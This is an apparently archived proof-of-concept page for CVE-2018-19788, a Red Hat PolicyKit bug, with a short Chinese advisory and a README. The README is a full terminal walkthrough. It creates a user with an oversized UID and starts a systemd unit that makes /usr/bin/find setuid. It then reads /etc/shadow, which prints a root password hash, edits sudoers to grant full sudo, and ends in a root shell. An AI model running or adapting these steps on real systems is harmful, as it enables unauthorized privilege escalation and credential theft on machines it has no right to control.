CVE-2018-19788 PoC — Red Hat PolicyKit 输入验证错误漏洞

Source

https://github.com/jhlongjr/CVE-2018-19788

Associated Vulnerability

Title:Red Hat PolicyKit 输入验证错误漏洞 (CVE-2018-19788)
Description:Red Hat PolicyKit（Polkit）是美国红帽（Red Hat）公司的一个用于在Unix兼容系统中对应用程序进行权限控制的工具。该工具为现代桌面提供了一个中央框架用于授权一般应用程序进行特权工作。 Red Hat PolicyKit 0.115版本中存在安全漏洞。攻击者可利用该漏洞执行任意的systemctl命令。

Description

Exploiting The CVE-2018-19788 PolicyKit Bug

Readme

# CVE-2018-19788
Exploiting The CVE-2018-19788 PolicyKit Bug

Steps to exploit PolicyKit bug on a fully patched CentOS7 installation.

[root@centos7 ~]# groupadd -g 4000000000 cve201819788  
[root@centos7 ~]# useradd -m -c "User With High UID" -u 4000000000 -g 4000000000 -s /bin/bash cve201819788  
[root@centos7 ~]# id cve201819788  
 uid=4000000000(cve201819788) gid=4000000000(cve201819788) groups=4000000000(cve201819788)  
[root@centos7 ~]# cat >hacked.service<<HACKED  
[Unit]  
Description=Hacked Service  
 
[Service]  
Type=notify  
ExecStart=/bin/bash -c "chmod +s /usr/bin/find"  
KillMode=process  
Restart=on-failure  
RestartSec=60s  
 
[Install]  
WantedBy=multi-user.target  
HACKED  

[root@centos7 ~]# systemctl link $(pwd)/hacked.service  
Created symlink from /etc/systemd/system/hacked.service to /root/hacked.service.  
[root@centos7 ~]# su - cve201819788  
[cve201819788@centos7 ~]$ whoami  
cve201819788  
[cve201819788@centos7 ~]$ grep root /etc/shadow  
grep: /etc/shadow: Permission denied  
[cve201819788@centos7 ~]$ systemctl start hacked  
 
 (pkttyagent:12785): GLib-GObject-WARNING **: 21:08:45.965: value "-294967296" of type 'gint' is invalid or out of range for property 'uid' of type 'gint' **    
 ERROR:pkttyagent.c:146:main: assertion failed: (polkit_unix_process_get_uid (POLKIT_UNIX_PROCESS (subject)) >= 0)  

[cve201819788@centos7 ~]$ ls -l $(which find)  
-rwsr-sr-x. 1 root root 199304 Oct 30 12:42 /bin/find  
[cve201819788@centos7 ~]$ find /etc/shadow -exec grep root {} \;  
root:$6$/zGjAAFHb.RUQJPx$qJH5DgIrZ1avYAeceWPNKitAbyGxMQ6vaOL7MfJ84mrwU6xgOxr/4hpQqdNWQiX6nBgu9WUKqWrJ4t6zRFbIN1::0:99999:7:::  
[cve201819788@centos7 ~]$ find /etc/sudoers -exec visudo -f {} \;  

## Insert following into sudoers file  
cve201819788    ALL=(ALL)       ALL  
##  

[cve201819788@centos7 ~]$ sudo -l  
[sudo] password for cve201819788:   
Matching Defaults entries for cve201819788 on centos7:  
     !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1  
     PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER  
     LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin  
 
 User cve201819788 may run the following commands on centos7:  
     (ALL) ALL  
 [cve201819788@centos7 ~]$ sudo su -  
 Last login: Sun Dec 30 20:59:54 EST 2018 from 192.168.1.2 on pts/0  
 [root@centos7 ~]# whoami  
 root

File Snapshot


 [4.0K]  /data/pocs/2b9be3b846cb2ce750ebd590ef12839771914224
├── [ 34K]  LICENSE
└── [2.6K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!